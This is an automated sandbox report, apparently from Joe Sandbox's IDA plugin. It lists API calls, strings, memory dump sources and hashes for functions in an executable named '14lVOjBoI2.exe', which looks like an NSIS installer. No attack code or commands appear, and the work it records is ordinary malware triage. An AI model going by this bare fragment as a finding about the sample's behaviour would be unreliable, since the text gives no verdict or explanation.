                                                                                                          • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                          • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                          • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                          • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                          APIs
                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$Alloc
                                                                                                          • String ID: s<u
                                                                                                          • API String ID: 1780285237-779365171
                                                                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                          APIs
                                                                                                          • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\14lVOjBoI2.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                          • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                          • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\14lVOjBoI2.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                          • CharPrevW.USER32(0040A300,0040A300,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                          Strings
                                                                                                          • "C:\Users\user\Desktop\14lVOjBoI2.exe", xrefs: 0040632D
                                                                                                          • *?|<>/":, xrefs: 0040633B
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$Prev
                                                                                                          • String ID: "C:\Users\user\Desktop\14lVOjBoI2.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 589700163-807749564
                                                                                                          • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                          • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                          • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                          • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                          • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                          • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                          • GetSysColor.USER32(?), ref: 004041E4
                                                                                                          • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                          • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2320649405-0
                                                                                                          • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                          • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                          • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                          • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                          • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                          • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,76F923A0), ref: 0040520F
                                                                                                          • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2531174081-0
                                                                                                          • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                          • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                          • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                          • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                          • GetMessagePos.USER32 ref: 00404AA1
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                          • String ID: f
                                                                                                          • API String ID: 41195575-1993550816
                                                                                                          • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                          • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                          • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                          • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                          APIs
                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                          • MulDiv.KERNEL32(0007350F,00000064,00073513), ref: 00402D4D
                                                                                                          • wsprintfW.USER32 ref: 00402D5D
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                          Strings
                                                                                                          • verifying installer: %d%%, xrefs: 00402D57
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                          • String ID: verifying installer: %d%%
                                                                                                          • API String ID: 1451636040-82062127
                                                                                                          • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                          • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                          • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                          • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                          APIs
                                                                                                          • GetDC.USER32(?), ref: 00401D59
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                          • String ID: Calibri
                                                                                                          • API String ID: 3808545654-1409258342
                                                                                                          • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                          • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                          • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                          • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                          APIs
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                          • String ID:
                                                                                                          • API String ID: 4216380887-0
                                                                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                          • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2667972263-0
                                                                                                          • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                          • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                          • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                          • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsr675C.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsr675C.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr675C.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsr675C.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsr675C.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsr675C.tmp$C:\Users\user\AppData\Local\Temp\nsr675C.tmp\System.dll
                                                                                                          • API String ID: 3109718747-794181135
                                                                                                          • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                          • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                          • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                          • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeGlobal
                                                                                                          • String ID:
                                                                                                          • API String ID: 2979337801-0
                                                                                                          • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                          • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1912718029-0
                                                                                                          • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                          • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                          • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                          • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1148316912-0
                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D0D
